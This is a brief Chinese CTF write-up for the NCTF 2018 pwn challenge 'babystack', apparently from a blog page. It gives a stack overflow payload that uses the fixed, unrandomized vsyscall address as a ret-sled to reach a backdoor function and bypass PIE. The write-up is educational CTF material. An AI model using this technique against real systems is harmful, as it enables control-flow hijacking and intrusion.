nctf2018 | pwn wp

babystack

  • 这道题目用到了一个 vsyscall 的点。。。
  • 保护 : nx , pie
  • 限制 : 输入长度 8 * n
  • 利用过程 :
    • payload = "a" * 0x18 + p64(0xffffffffff600000) * 2
  • 利用:
      1. 栈上有后门函数的地址
      1. """#define VSYSCALL_ADDR_vgettimeofday 0xffffffffff600000"""
      • 2.1 这个地址不参与随机化
      • 2.2 这个vsyscall 执行的指令
        """
        0xffffffffff600000: mov rax,0x60
        0xffffffffff600007: syscall
        0xffffffffff600009: ret"""
      • 2.3 这个指令会不断 ret 栈上的地址,结合后门地址在栈上, 从而 返回到后门函数
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 2018-网鼎杯 第一场 pwn writueup
    网鼎杯第一场wp guess防护机制:image.png 开启了canary和NX 简单的看了下反编译的逻辑 发现...
    zs0zrc阅读 6,065评论 0 4
  • hehe
    王爽汇编全书知识点大纲 第一章 基础知识 机器语言 汇编语言的产生 汇编语言的组成 存储器 cpu对存储器的读写 ...
    2c3ba901516f阅读 7,102评论 0 1
  • 2018-04-02
    2018-04-02 (稻盛哲学学习会)打卡第32天 姓名:王燕君 部门:分水碶 组别:待定 【知~学习】 1、诵...
    王燕君分水碶阅读 1,638评论 0 0
  • 聚山城
    火锅串串鸡公煲。 麻辣万万不能少。 小面包面钟水饺。 豆花米线和烧烤。 冒菜血旺难伯仲。 冰糕冰粉哪正宗。 小龙坎...
    千小浔阅读 1,521评论 0 2
  • 最终谁都是依赖不了的
    昨天就想着这个题目,心里一顿发冷,一直以来都是想找棵大树依靠的,在家里靠着父母,结婚后靠着丈夫。 实际上,你最终谁...
    春雨_373c阅读 1,332评论 0 2